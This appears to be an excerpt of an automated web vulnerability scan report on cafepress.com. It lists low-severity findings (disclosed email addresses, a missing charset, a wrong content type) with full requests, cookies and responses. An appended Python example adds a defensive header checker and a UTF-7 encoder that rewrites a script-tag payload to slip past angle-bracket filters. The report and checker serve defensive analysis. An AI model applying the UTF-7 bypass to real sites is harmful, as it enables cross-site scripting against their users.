Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 52596
Date: Sun, 26 Dec 2010 13:48:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
<a href="mailto:someemail@cafepress.com ">...[SNIP]...
6.8. http://www.cafepress.com/make/custom-thermos
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-thermos
Issue detail
The following email address was disclosed in the response: support@cafepress.com
Request
GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 55367
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
<a href="mailto:support@cafepress.com ">...[SNIP]...
6.9. http://www.cafepress.com/make/custom-water-bottles
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-water-bottles
Issue detail
The following email address was disclosed in the response: eteamz@CafePress.com
Request
GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 58794
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
<a href="mailto:eteamz@CafePress.com ">...[SNIP]...
6.10. http://www.cafepress.com/make/personalized-gifts
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-gifts
Issue detail
The following email address was disclosed in the response: support@cafepress.com
Request
GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 71867
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
<a href="mailto:support@cafepress.com ">support@cafepress.com </a>...[SNIP]...
6.11. http://www.cafepress.com/make/personalized-ornaments
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-ornaments
Issue detail
The following email address was disclosed in the response: eteamz@CafePress.com
Request
GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 54240
Date: Sun, 26 Dec 2010 13:47:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
<a href="mailto:eteamz@CafePress.com ">...[SNIP]...
7. HTML does not specify charset
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/moredetails.aspx
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /cp/moredetails.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 400 Bad Request
Content-Type: text/html
Location: /cp/bing/errorpage.html?aspxerrorpath=/cp/moredetails.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Content-Length: 11
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

Bad Request
8. Content type incorrectly stated
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/moredetails.aspx
Issue detail
The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
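Added example, not part of the XSS.CX report and not Burp's own check code: a small Python checker that applies the two tests behind findings 7 and 8 (a text/* Content-Type with no charset parameter, and a declared text/html whose body carries no HTML) to raw HTTP responses, together with a hand-rolled UTF-7 shifter that shows what the "UTF-7 filter bypass" mentioned in finding 7 looks like on the wire. The sample responses are constructed for the example; BAD_REQUEST is modelled on the 400 response shown above with the tracking headers trimmed, and the other two are invented for contrast. Function and constant names are mine.

```python
import base64
import re

# Constructed sample responses (not captured from the site). BAD_REQUEST is
# modelled on the 400 response in findings 7 and 8, tracking headers trimmed.
BAD_REQUEST = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html\r\n"
    b"Location: /cp/bing/errorpage.html?aspxerrorpath=/cp/moredetails.aspx\r\n"
    b"Server: Microsoft-IIS/7.0\r\n"
    b"Content-Length: 11\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"Bad Request"
)
HTML_WITH_CHARSET = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b"<!DOCTYPE html><html><body><p>hello</p></body></html>"
)
HTML_WITHOUT_CHARSET = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body><p>hello</p></body></html>"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, [(name, value)], body).
    Header names are lower-cased; duplicates are kept so they can be counted."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def content_type_findings(raw):
    """Return the findings for one response, in this order:
    'missing-charset'        text/* media type with no charset parameter (finding 7)
    'content-type-mismatch'  declared text/html but no HTML tag in the body (finding 8)
    'multiple-content-type'  more than one Content-Type header"""
    _, headers, body = parse_response(raw)
    ctypes = [v for n, v in headers if n == "content-type"]
    if not ctypes:
        return ["no-content-type"] if body else []
    findings = []
    media, _, params = ctypes[0].partition(";")
    media = media.strip().lower()
    if media.startswith("text/") and not re.search(r"charset\s*=", params, re.I):
        findings.append("missing-charset")
    looks_html = re.search(rb"<(!doctype|[a-z][a-z0-9]*)[\s>/]", body, re.I)
    if media == "text/html" and not looks_html:
        findings.append("content-type-mismatch")
    if len(ctypes) > 1:
        findings.append("multiple-content-type")
    return findings


# RFC 2152 "Set D" plus the whitespace UTF-7 lets through unencoded.
SET_D = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:? \t\r\n")


def utf7_shift(text):
    """Encode text as UTF-7 with every character outside Set D base64-shifted.
    Python's own utf-7 codec writes '<' and '>' as literal ASCII, which would
    defeat the point: the payload must contain no '<' or '>' bytes at all, so
    a filter looking for them sees nothing, while a browser that sniffs the
    page as UTF-7 still decodes a script tag."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text[i] in SET_D:
            out += text[i].encode("ascii")
            i += 1
            continue
        j = i
        while j < len(text) and text[j] not in SET_D:
            j += 1
        b64 = base64.b64encode(text[i:j].encode("utf-16-be")).rstrip(b"=")
        out += b"+" + b64 + b"-"
        i = j
    return bytes(out)


def demo():
    payload = "<script>alert(1)</script>"
    shifted = utf7_shift(payload)
    return {
        "bad_request": content_type_findings(BAD_REQUEST),
        "with_charset": content_type_findings(HTML_WITH_CHARSET),
        "without_charset": content_type_findings(HTML_WITHOUT_CHARSET),
        "utf7_payload": shifted,
        "utf7_round_trip": shifted.decode("utf-7") == payload,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

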